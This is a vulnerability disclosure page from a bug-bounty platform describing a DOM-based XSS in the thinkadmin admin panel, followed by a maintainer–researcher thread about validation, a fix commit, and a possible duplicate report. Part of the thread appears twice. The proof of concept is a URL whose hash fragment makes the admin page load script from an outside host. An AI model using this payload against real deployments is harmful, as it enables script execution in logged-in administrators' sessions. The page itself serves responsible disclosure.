Cross-site Scripting (XSS) - DOM in zoujingli/thinkadmin

Valid

Reported on

Sep 15th 2021

Description

DOM based xss via url hash frgament

Proof of Concept

First login into https://v6.thinkadmin.top and then visit https://v6.thinkadmin.top/admin.html#https://bbounty.000webhostapp.com/cors.php?id=xxxxx2 and see xss is executed

Impact

DOM based xss via url hash fragment

We have contacted a member of the zoujingli/thinkadmin team and are waiting to hear back 2 years ago

邹景立 has invalidated this vulnerability 2 years ago

The framework design needs to use hash to load page resources and allows the use of JavaScript. Therefore, such problems are inevitable and need to be used.

The disclosure bounty has been dropped

The fix bounty has been dropped

ranjit-git

commented 2 years ago

Researcher

If you want to load hash fragment then only allow server url.
Here you can see I can set any arbitary url and it will fetch data

ranjit-git

commented 2 years ago

Researcher

Here in my poc url you can see it fetches any url. But you need to set url to be fetch from own server

邹景立

commented 2 years ago

Maintainer

I'm very sorry. After careful consideration, I decided to fix this problem, but it has been closed and can't be marked.

ranjit-git

commented 2 years ago

Researcher

@admin . I asking admin to re-open this bug so that you can validate the bug

邹景立

commented 2 years ago

Maintainer

OK, I also suggest the administrator to reopen it!

Jamie Slome

commented 2 years ago

Admin

I have updated the report to pending - feel free to mark it as you please!

邹景立 validated this vulnerability 2 years ago

ranjit-git has been awarded the disclosure bounty

The fix bounty is now up for grabs

邹景立 marked this as fixed with commit 4469f7 2 years ago

邹景立 has been awarded the fix bounty

This vulnerability will not receive a CVE

0x9x

commented 2 years ago

Nice find !

Jamie Slome

commented 2 years ago

Admin

@maintainer - just jumping in here!

We just want to know if you perceive this report to be a duplicate of:

https://huntr.dev/bounties/5c129785-cf80-4123-b869-3945b386139a/

邹景立

commented 2 years ago

Maintainer

@admin Confirm duplicate report.

0x9x

commented 2 years ago

i confirm the duplicated report , but not the verbose error reported on my original report . So i hope you can accept also my report .

Jamie Slome

commented 2 years ago

Admin

As we are in a unique situation, would both researchers be happy to split the bounty for the disclosure, half/half?

to join this conversation

We have contacted a member of the zoujingli/thinkadmin team and are waiting to hear back 2 years ago

邹景立 has invalidated this vulnerability 2 years ago

The framework design needs to use hash to load page resources and allows the use of JavaScript. Therefore, such problems are inevitable and need to be used.

The disclosure bounty has been dropped

The fix bounty has been dropped

ranjit-git

commented 2 years ago

Researcher

If you want to load hash fragment then only allow server url.
Here you can see I can set any arbitary url and it will fetch data

ranjit-git

commented 2 years ago

Researcher

Here in my poc url you can see it fetches any url. But you need to set url to be fetch from own server

邹景立

commented 2 years ago